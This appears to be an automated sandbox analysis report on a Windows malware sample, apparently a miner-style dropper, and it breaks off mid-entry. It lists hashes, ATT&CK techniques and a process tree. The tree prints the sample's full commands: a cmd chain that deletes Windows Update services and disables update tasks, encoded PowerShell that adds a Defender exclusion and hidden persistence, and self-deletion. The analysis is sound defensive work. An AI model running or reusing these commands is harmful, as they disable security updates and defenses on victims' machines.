5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

General

Target

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
Size

2.2MB
MD5

d5dfb8447ced11274942ace31b4279d8
SHA1

5a1b36ef9db72321b3d075712a8888bd921a472c
SHA256

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
SHA512

92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
SSDEEP

49152:NZMzod1k0XlJTfu7lCwMBLEUGu20S2hnnRYKiPCZYj8bkN2P:N2C1k+bMlCwWl2qhnnRYKECZYI44

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Drops file in Drivers directory 2 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exeupdates.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updates.exe

Executes dropped EXE 1 IoCs

Processes:

updates.exe

pid process

4584 updates.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4192 takeown.exe
4172 icacls.exe
2000 takeown.exe
2272 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2000 takeown.exe
2272 icacls.exe
4192 takeown.exe
4172 icacls.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1604 sc.exe
1668 sc.exe
5104 sc.exe
1992 sc.exe
4436 sc.exe
4060 sc.exe
3864 sc.exe
2108 sc.exe
4884 sc.exe
5100 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4584	updates.exe

pid	process
4192	takeown.exe
4172	icacls.exe
2000	takeown.exe
2272	icacls.exe

pid	process
2000	takeown.exe
2272	icacls.exe
4192	takeown.exe
4172	icacls.exe

pid	process
1604	sc.exe
1668	sc.exe
5104	sc.exe
1992	sc.exe
4436	sc.exe
4060	sc.exe
3864	sc.exe
2108	sc.exe
4884	sc.exe
5100	sc.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1184	reg.exe
1732	reg.exe
4440	reg.exe
4548	reg.exe
2104	reg.exe
3368	reg.exe
4440	reg.exe
4460	reg.exe
1932	reg.exe
3728	reg.exe
4968	reg.exe
4388	reg.exe
4468	reg.exe
4684	reg.exe
3424	reg.exe
5004	reg.exe
1232	reg.exe
4508	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exe5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exepowershell.exepowershell.exe

pid	process
1788	powershell.exe
1788	powershell.exe
1788	powershell.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeIncreaseQuotaPrivilege	1788	powershell.exe
Token: SeSecurityPrivilege	1788	powershell.exe
Token: SeTakeOwnershipPrivilege	1788	powershell.exe
Token: SeLoadDriverPrivilege	1788	powershell.exe
Token: SeSystemProfilePrivilege	1788	powershell.exe
Token: SeSystemtimePrivilege	1788	powershell.exe
Token: SeProfSingleProcessPrivilege	1788	powershell.exe
Token: SeIncBasePriorityPrivilege	1788	powershell.exe
Token: SeCreatePagefilePrivilege	1788	powershell.exe
Token: SeBackupPrivilege	1788	powershell.exe
Token: SeRestorePrivilege	1788	powershell.exe
Token: SeShutdownPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeSystemEnvironmentPrivilege	1788	powershell.exe
Token: SeRemoteShutdownPrivilege	1788	powershell.exe
Token: SeUndockPrivilege	1788	powershell.exe
Token: SeManageVolumePrivilege	1788	powershell.exe
Token: 33	1788	powershell.exe
Token: 34	1788	powershell.exe
Token: 35	1788	powershell.exe
Token: 36	1788	powershell.exe
Token: SeShutdownPrivilege	3472	powercfg.exe
Token: SeCreatePagefilePrivilege	3472	powercfg.exe
Token: SeShutdownPrivilege	3040	powercfg.exe
Token: SeCreatePagefilePrivilege	3040	powercfg.exe
Token: SeShutdownPrivilege	1300	powercfg.exe
Token: SeCreatePagefilePrivilege	1300	powercfg.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeCreatePagefilePrivilege	2000	powercfg.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeTakeOwnershipPrivilege	4192	takeown.exe
Token: SeIncreaseQuotaPrivilege	4928	powershell.exe
Token: SeSecurityPrivilege	4928	powershell.exe
Token: SeTakeOwnershipPrivilege	4928	powershell.exe
Token: SeLoadDriverPrivilege	4928	powershell.exe
Token: SeSystemProfilePrivilege	4928	powershell.exe
Token: SeSystemtimePrivilege	4928	powershell.exe
Token: SeProfSingleProcessPrivilege	4928	powershell.exe
Token: SeIncBasePriorityPrivilege	4928	powershell.exe
Token: SeCreatePagefilePrivilege	4928	powershell.exe
Token: SeBackupPrivilege	4928	powershell.exe
Token: SeRestorePrivilege	4928	powershell.exe
Token: SeShutdownPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeSystemEnvironmentPrivilege	4928	powershell.exe
Token: SeRemoteShutdownPrivilege	4928	powershell.exe
Token: SeUndockPrivilege	4928	powershell.exe
Token: SeManageVolumePrivilege	4928	powershell.exe
Token: 33	4928	powershell.exe
Token: 34	4928	powershell.exe
Token: 35	4928	powershell.exe
Token: 36	4928	powershell.exe
Token: SeIncreaseQuotaPrivilege	4928	powershell.exe
Token: SeSecurityPrivilege	4928	powershell.exe
Token: SeTakeOwnershipPrivilege	4928	powershell.exe
Token: SeLoadDriverPrivilege	4928	powershell.exe
Token: SeSystemProfilePrivilege	4928	powershell.exe
Token: SeSystemtimePrivilege	4928	powershell.exe
Token: SeProfSingleProcessPrivilege	4928	powershell.exe
Token: SeIncBasePriorityPrivilege	4928	powershell.exe
Token: SeCreatePagefilePrivilege	4928	powershell.exe
Token: SeBackupPrivilege	4928	powershell.exe
Token: SeRestorePrivilege	4928	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2716 wrote to memory of 1788	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 2716 wrote to memory of 1788	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 2716 wrote to memory of 3592	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 3592	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 5040	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 5040	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 3592 wrote to memory of 4436	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 4436	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 4060	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 4060	3592	cmd.exe	sc.exe
PID 5040 wrote to memory of 3472	5040	cmd.exe	powercfg.exe
PID 5040 wrote to memory of 3472	5040	cmd.exe	powercfg.exe
PID 5040 wrote to memory of 3040	5040	cmd.exe	powercfg.exe
PID 5040 wrote to memory of 3040	5040	cmd.exe	powercfg.exe
PID 3592 wrote to memory of 1604	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 1604	3592	cmd.exe	sc.exe
PID 2716 wrote to memory of 4928	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 2716 wrote to memory of 4928	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 5040 wrote to memory of 1300	5040	cmd.exe	powercfg.exe
PID 5040 wrote to memory of 1300	5040	cmd.exe	powercfg.exe
PID 3592 wrote to memory of 1668	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 1668	3592	cmd.exe	sc.exe
PID 5040 wrote to memory of 2000	5040	cmd.exe	powercfg.exe
PID 5040 wrote to memory of 2000	5040	cmd.exe	powercfg.exe
PID 3592 wrote to memory of 5104	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 5104	3592	cmd.exe	sc.exe
PID 3592 wrote to memory of 4440	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4440	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4388	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4388	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 5004	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 5004	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4468	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4468	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1232	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1232	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4192	3592	cmd.exe	takeown.exe
PID 3592 wrote to memory of 4192	3592	cmd.exe	takeown.exe
PID 3592 wrote to memory of 4172	3592	cmd.exe	icacls.exe
PID 3592 wrote to memory of 4172	3592	cmd.exe	icacls.exe
PID 2716 wrote to memory of 4652	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 4652	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 4144	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2716 wrote to memory of 4144	2716	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4652 wrote to memory of 3736	4652	cmd.exe	schtasks.exe
PID 4652 wrote to memory of 3736	4652	cmd.exe	schtasks.exe
PID 4144 wrote to memory of 3260	4144	cmd.exe	choice.exe
PID 4144 wrote to memory of 3260	4144	cmd.exe	choice.exe
PID 3592 wrote to memory of 4508	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4508	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4684	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4684	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4548	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4548	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4460	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 4460	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 896	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 896	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 512	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 512	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 416	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 416	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 4676	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 4676	3592	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
"C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4436

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4060

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1604

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1668

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:4440

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:5004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4388

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:4468

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1232

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4172

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4508

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4684

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4548

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4460

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:896

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:416

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4676

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1240

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1108

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "OneDrivesSystems"
2⤵
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\system32\schtasks.exe
schtasks /run /tn "OneDrivesSystems"
3⤵
PID:3736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4144

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:2848

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3864

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1992

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2108

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4884

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:3728

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:3368

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1184

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1732

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2000

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2272

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1932

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3424

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4440

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4968

C:\Windows\system32\schtasks.exe
